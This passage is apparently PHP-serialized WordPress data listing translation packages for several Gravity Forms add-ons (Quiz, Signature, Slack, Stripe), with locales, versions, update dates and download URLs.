Brasil\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:11:08+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:25:00+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2023-01-06T17:24:23+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-07-15T19:25:05+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"4.0\";s:7:\"updated\";s:25:\"2022-06-27T09:11:22+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsquiz/gravityformsquiz-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:21:\"gravityformssignature\";a:1:{s:12:\"translations\";a:21:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-02-20T14:25:47+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-02-20T14:32:41+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2022-06-27T10:11:12+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-05T10:00:55+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2021-08-12T08:00:46+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-04T11:55:12+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:55:33+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:55:40+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:55:41+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:55:44+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:55:45+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2021-09-14T09:57:36+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-12T14:45:18+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-11T15:48:10+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-15T00:44:40+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-20T18:21:48+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-25T07:10:36+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.4.1\";s:7:\"updated\";s:25:\"2023-03-06T09:12:09+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformssignature/gravityformssignature-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:17:\"gravityformsslack\";a:1:{s:12:\"translations\";a:19:{s:2:\"bg\";a:7:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-04-14T18:11:09+00:00\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-bg_BG.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"bg\";i:1;s:3:\"bul\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-05T09:57:46+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:26:43+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:94:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-04T11:54:33+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-20T13:44:54+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:26:48+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-05T09:29:59+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-14T13:29:12+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-23T05:05:50+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:94:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:27:08+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-12T14:43:50+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-11T15:47:04+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-15T00:45:58+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-20T18:21:23+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-25T06:00:54+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-06T09:11:19+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:97:\"https://packages.translationspress.com/rocketgenius/gravityformsslack/gravityformsslack-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformsstripe\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:13:01+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-03-05T09:59:12+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:13:20+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:13:25+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-02-19T14:45:46+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-03-02T20:57:26+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-07-15T09:36:40+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:27:36+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:27:53+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:27:55+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:28:01+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-29T21:52:01+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-27T10:14:58+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-07-16T02:09:21+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-29T23:32:49+00:00\";s:12:\"english_name\";s:21:\"Portuguese 